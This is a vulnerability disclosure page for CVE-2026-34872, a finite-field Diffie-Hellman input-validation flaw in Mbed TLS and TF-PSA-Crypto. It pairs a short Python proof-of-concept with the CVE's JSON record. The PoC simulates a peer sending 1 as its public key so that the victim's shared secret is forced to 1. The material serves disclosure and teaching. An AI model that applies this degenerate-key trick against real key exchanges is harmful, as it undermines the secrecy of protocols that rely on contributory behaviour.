CVE-2026-34872

import hashlib # PoC Concept: Demonstrating the lack of contributory behavior # by forcing a weak shared secret via a malicious peer public key. # In a vulnerable FFDH implementation, sending a small integer # as the public key might not be properly validated. def simulate_vulnerable_dh(prime, vulnerable_peer_public_key): """ Simulates the shared secret calculation on the victim's side. Assumes the victim accepts the 'vulnerable_peer_public_key' without validation. """ # Victim's private key (random) victim_private_key = 12345 # Calculate shared secret: (peer_public_key ^ victim_private_key) % prime # If peer_public_key is 1, shared_secret is always 1. shared_secret = pow(vulnerable_peer_public_key, victim_private_key, prime) return shared_secret # Example parameters p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF # Attack: The attacker sends '1' as the public key malicious_public_key = 1 # Victim calculates shared secret secret = simulate_vulnerable_dh(p, malicious_public_key) print(f"[+] Malicious Public Key sent: {malicious_public_key}") print(f"[+] Calculated Shared Secret: {secret}") if secret == 1: print("[+] Vulnerability Confirmed: Shared secret forced to a predictable value (1).") else: print("[-] Validation may be in place.")

{"cve": {"id": "CVE-2026-34872", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:27.493", "lastModified": "2026-04-03T20:02:33.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Mbed TLS 3.5.x and 3.6.x through 3.6.5 and TF-PSA-Crypto 1.0. There is a lack of contributory behavior in FFDH due to improper input validation. Using finite-field Diffie-Hellman, the other party can force the shared secret into a small set of values (lack of contributory behavior). This is a problem for protocols that depend on contributory behavior (which is not the case for TLS). The attack can be carried by the peer, or depending on the protocol by an active network attacker (person in the middle)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arm:mbed_tls:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.6", "matchCriteriaId": "C8FBFC2E-329D-4274-A952-2D43378B83BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arm:tf-psa-crypto:1.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "874FFF30-23C9-453A-8E82-037AD3F12345"}]}]}], "references": [{"url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2026-03-ffdh-peerkey-checks/", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}